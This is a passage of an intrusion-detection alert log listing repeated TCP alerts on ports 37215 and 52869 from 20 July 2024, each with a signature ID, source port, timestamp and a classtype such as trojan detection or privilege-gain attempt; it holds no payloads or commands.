                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221141
                      SID:2829579
                      Source Port:52906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2829579
                      Source Port:32822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.758577
                      SID:2027339
                      Source Port:57210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.328412
                      SID:2831300
                      Source Port:40100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:41962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:57906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:40010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.357099
                      SID:2027339
                      Source Port:56596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2835222
                      Source Port:46016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.484128
                      SID:2025132
                      Source Port:38784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.619336
                      SID:2027339
                      Source Port:34018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2829579
                      Source Port:60586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.510385
                      SID:2025132
                      Source Port:44282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.752804
                      SID:2025132
                      Source Port:39800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.809715
                      SID:2027339
                      Source Port:57964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556804
                      SID:2027339
                      Source Port:34306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2027339
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2829579
                      Source Port:57128
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.516827
                      SID:2027339
                      Source Port:57370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.690792
                      SID:2027339
                      Source Port:48132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.756265
                      SID:2027339
                      Source Port:59170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2027339
                      Source Port:52832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.380677
                      SID:2027339
                      Source Port:46780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:56538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.648154
                      SID:2831300
                      Source Port:49290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.704241
                      SID:2025132
                      Source Port:52420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.903209
                      SID:2025132
                      Source Port:48072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.185498
                      SID:2027339
                      Source Port:59604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.522869
                      SID:2025132
                      Source Port:39106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2025132
                      Source Port:48454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.809584
                      SID:2027339
                      Source Port:48800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790558
                      SID:2831300
                      Source Port:33926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.616435
                      SID:2831300
                      Source Port:50026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.947642
                      SID:2027339
                      Source Port:56402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.686830
                      SID:2831300
                      Source Port:45028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.193880
                      SID:2027339
                      Source Port:53462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.462458
                      SID:2027339
                      Source Port:56652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053062
                      SID:2829579
                      Source Port:44258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.783923
                      SID:2027339
                      Source Port:32792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.166507
                      SID:2027339
                      Source Port:46270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.819275
                      SID:2025132
                      Source Port:60586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.631925
                      SID:2027339
                      Source Port:42362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.536863
                      SID:2027339
                      Source Port:49478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.574617
                      SID:2027339
                      Source Port:39656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2831300
                      Source Port:40076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.519318
                      SID:2027339
                      Source Port:51790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2025132
                      Source Port:53138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2835222
                      Source Port:60566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.330511
                      SID:2027339
                      Source Port:44976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:46192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2829579
                      Source Port:40100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.201976
                      SID:2027339
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593868
                      SID:2025132
                      Source Port:42564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.725077
                      SID:2025132
                      Source Port:40848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2829579
                      Source Port:53440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:46116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486622
                      SID:2027339
                      Source Port:43704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.047922
                      SID:2027339
                      Source Port:35292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.422050
                      SID:2831300
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.799089
                      SID:2027339
                      Source Port:53122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:60380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.950811
                      SID:2025132
                      Source Port:33400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.758954
                      SID:2831300
                      Source Port:60556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2027339
                      Source Port:51492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.726681
                      SID:2027339
                      Source Port:54012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2027339
                      Source Port:34566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.889163
                      SID:2829579
                      Source Port:54718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:50560
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2831300
                      Source Port:44950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.968362
                      SID:2831300
                      Source Port:53002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2831300
                      Source Port:57430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.246033
                      SID:2025132
                      Source Port:54622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:60280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157620
                      SID:2829579
                      Source Port:59522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.910426
                      SID:2829579
                      Source Port:54072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2829579
                      Source Port:59284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:40850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2835222
                      Source Port:44664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.359091
                      SID:2025132
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:36930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2027339
                      Source Port:33372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.500950
                      SID:2831300
                      Source Port:34280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.291705
                      SID:2831300
                      Source Port:43302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.916250
                      SID:2829579
                      Source Port:51264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.628217
                      SID:2027339
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105908
                      SID:2829579
                      Source Port:53884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.945748
                      SID:2025132
                      Source Port:54138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221273
                      SID:2829579
                      Source Port:38628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.631492
                      SID:2831300
                      Source Port:40900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2831300
                      Source Port:46698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:05.835826
                      SID:2025132
                      Source Port:48206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.341391
                      SID:2027339
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650870
                      SID:2835222
                      Source Port:50818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2835222
                      Source Port:53018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.508021
                      SID:2027339
                      Source Port:34132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.196200
                      SID:2027339
                      Source Port:33894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:57730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.287452
                      SID:2027339
                      Source Port:51150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592254
                      SID:2831300
                      Source Port:59972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.128674
                      SID:2025132
                      Source Port:51322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2835222
                      Source Port:41738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2831300
                      Source Port:43754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.076593
                      SID:2829579
                      Source Port:38906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2025132
                      Source Port:49602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.926055
                      SID:2027339
                      Source Port:54108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.466755
                      SID:2027339
                      Source Port:60066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.201976
                      SID:2025132
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2829579
                      Source Port:53410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.640831
                      SID:2831300
                      Source Port:55554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.989160
                      SID:2027339
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.238230
                      SID:2025132
                      Source Port:35440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221583
                      SID:2829579
                      Source Port:44458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2027339
                      Source Port:40290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2835222
                      Source Port:52462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2027339
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.498136
                      SID:2025132
                      Source Port:53224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.328264
                      SID:2025132
                      Source Port:44472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2829579
                      Source Port:42378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:38370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.642694
                      SID:2025132
                      Source Port:36822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.308979
                      SID:2027339
                      Source Port:52268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.615311
                      SID:2027339
                      Source Port:48022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2831300
                      Source Port:55062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.071868
                      SID:2025132
                      Source Port:57942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.213768
                      SID:2027339
                      Source Port:43116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.254553
                      SID:2027339
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.603963
                      SID:2027339
                      Source Port:55590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2027339
                      Source Port:38444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.555540
                      SID:2027339
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.953142
                      SID:2027339
                      Source Port:46738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.504284
                      SID:2027339
                      Source Port:33126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.530468
                      SID:2027339
                      Source Port:49066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.602712
                      SID:2027339
                      Source Port:43894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.948226
                      SID:2027339
                      Source Port:42126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.228425
                      SID:2025132
                      Source Port:43454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.886795
                      SID:2027339
                      Source Port:51338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.571815
                      SID:2831300
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2831300
                      Source Port:34472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.880524
                      SID:2027339
                      Source Port:59136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.960642
                      SID:2835222
                      Source Port:54608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.229799
                      SID:2025132
                      Source Port:36008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2027339
                      Source Port:54042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.321432
                      SID:2025132
                      Source Port:47342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.559176
                      SID:2025132
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:50554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:36896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2829579
                      Source Port:40708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2027339
                      Source Port:52970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.935770
                      SID:2025132
                      Source Port:36748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2835222
                      Source Port:34654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.164622
                      SID:2027339
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.536328
                      SID:2027339
                      Source Port:55126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2027339
                      Source Port:39588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2835222
                      Source Port:41330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:48886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2027339
                      Source Port:39278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2835222
                      Source Port:33904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2027339
                      Source Port:35816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.837053
                      SID:2025132
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.752804
                      SID:2027339
                      Source Port:39800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:46500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2027339
                      Source Port:49088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:45562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.096471
                      SID:2025132
                      Source Port:44870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:57472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.212550
                      SID:2025132
                      Source Port:40964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2025132
                      Source Port:53416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.596402
                      SID:2831300
                      Source Port:51192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:37938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.559917
                      SID:2831300
                      Source Port:37734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.426363
                      SID:2027339
                      Source Port:34988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.594415
                      SID:2831300
                      Source Port:44100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.439012
                      SID:2025132
                      Source Port:50128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2027339
                      Source Port:45074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.322405
                      SID:2025132
                      Source Port:59520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:59956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.491060
                      SID:2831300
                      Source Port:56394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2027339
                      Source Port:49450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.304967
                      SID:2025132
                      Source Port:34938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
